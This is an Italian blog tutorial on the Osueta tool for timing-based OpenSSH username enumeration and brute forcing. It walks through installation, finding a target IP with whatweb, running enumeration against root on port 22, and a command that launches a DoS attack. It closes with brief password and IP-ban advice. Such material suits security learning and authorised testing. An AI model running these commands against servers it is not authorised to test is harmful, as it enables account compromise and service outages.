Cari lettori di Tecnogalaxy, oggi riprenderemo l’argomento sugli attacchi Brute Force con il potente tool Osueta.

Osueta è un potente script scritto in Python utilizzato per sfruttare le vulnerabilità di OpenSSH, seguendo la metodologia di attacco basata sul tempo di enumerazione utente.

L’attaccante cerca i nomi utente su un server di destinazione, questo tool rende più efficace l’attacco a forza bruta per trovare solo le password per i nomi utente identificati.

OpenSSH

OpenSSH è una suite di sicurezza a livello di rete che utilizza il protocollo Secure Shell (SSH) , serve a proteggere la comunicazione di rete attraverso diverse tecniche di crittografia.

Il protocollo SSH è stato introdotto per evitare gli attacchi Man in the middle (MITM). Il server OpenSSH utilizza protocolli di autenticazione basati su nome utente e password, Osueta possiamo utilizzarlo per sfruttare le vulnerabilità del server OpenSSH.

Come sempre ci viene incontro il nostro caro amico Kali Linux!

Apriamo una shell e scriviamo il comando:

apt-get install python-ipy python-nmap
pip install paramiko

Posizioniamoci sul descktop, ne mio caso:

cd Scrivania

Cloniamo il tool:

git clone https://github.com/c0r3dump3d/osueta.git

Posizioniamoci all’interno della directory

cd osueta

Per utilizzare il tool Osueta , dobbiamo sapere l’indirizzo IP della macchina da testare, possiamo farlo usando il seguente comando:

whatweb “url del sito”

Una volta trovato l’ip, scriviamo il seguente comando:

python osueta.py –H “ip trovato” –U root –p 22

H è l’indirizzo ip del sito

U rappresenta un nome utente casuale , come ad esempio root, admin etc….

P è il numero di porta da utilizzare per il test.

Osueta verifica lo stato della porta, (aperta o chiusa). Se la porta è aperta, rileva il banner di servizio per conoscere la versione SSH. Successivamente il tool verifica i nomi utente casuali analizzando i ritardi. E’ possibile anche inserire nel tool dizionari propri da utilizzare, in caso di ritardo significa che il nome utente testato esiste (il server è impegnato a generare e confrontare l’hash di una password molto lunga fornita da Osueta).

Osueta può essere utilizzato anche per eseguire un attacco DoS (Denial of Service), usando il comando seguente:

./osueta.py –H “indirizzo ip” –p 22 –U root –v no –dos yes

Per vedere tutte le funzioni del tool e i parametri da utilizzare, basta scrivere il seguente comando:

./osueta.py -h

Optional arguments:

-h,         –help  show this help message and exit

-H          HOST     Host Ip or CIDR netblock.

-k           HFILE    Host list in a file.

-f            FQDN     FQDN to attack.

-p           PORT     Host port.

-L           UFILE    Username list file.

-U          USER     Only use a single username.

-d           DELAY    Time delay fixed in seconds. If not, delay time is calculated.

-v           VARI     Make variations of the username (default yes).

-o           OUTP     Output file with positive results.

-l            LENGTH   Length of the password in characters (x1000) (default 40).

-c           VERS     Check or not the OpenSSH version (default yes).

–dos     DOS   Try to make a DOS attack (default no).

-t           THREADS  Threads for the DOS attack (default 5).

Come difendersi dagli attacchi brute force

Ovviamente la miglior protezione è utilizzare una buona password, da considerare come se fosse paragonabile alle chiavi di casa.

La maggior parte delle persone, per comodità utilizza combinazioni facili. Da una ricerca fatta nel 2016 la password più utilizzata è stata “123456”, al secondo posto invece, la medaglia è andata alla parola “password”, mentre la medaglia di legno (al terzo posto) il codice “12345678”.

Un altro errore molto frequente è quello di usare la stessa parola ripetuta al contrario. In Rete esistono molti programmi gratuiti che sfruttano gli schemi comuni, permettendo di decifrare password poco complesse.

E’ possibile inoltre attivare dei controlli che monitorizzano costantemente i sistemi, dopo diversi tentativi è possibile bannare l’indirizzo ip.

Come sempre fatene buon uso facendo dei test su vostri devaice / computer , farli su devaice/computer non vostri è illegale.

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Al prossimo articolo!

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.